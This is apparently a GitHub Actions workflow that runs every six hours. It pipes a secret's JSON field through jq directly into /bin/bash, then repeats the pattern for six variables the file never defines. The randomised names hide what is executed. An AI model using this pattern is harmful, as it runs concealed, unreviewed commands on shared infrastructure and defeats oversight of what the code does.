name: xiangsud
on:
  workflow_dispatch:
  schedule:
    - cron: '29 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiangsud
        env:
          zf86: ${{ secrets.zf86 }}
        run: |
          echo $zf86 | jq -r .fkuwb69583 | /bin/bash
          echo $hh9197 | jq -r .m37217 | /bin/bash
          echo $oef2887 | jq -r .nq9481 | /bin/bash
          echo $cna67 | jq -r .xp9 | /bin/bash
          echo $w52443 | jq -r .acaxv98627 | /bin/bash
          echo $ddtzo48528 | jq -r .t39 | /bin/bash
          echo $q030 | jq -r .vtam321 | /bin/bash

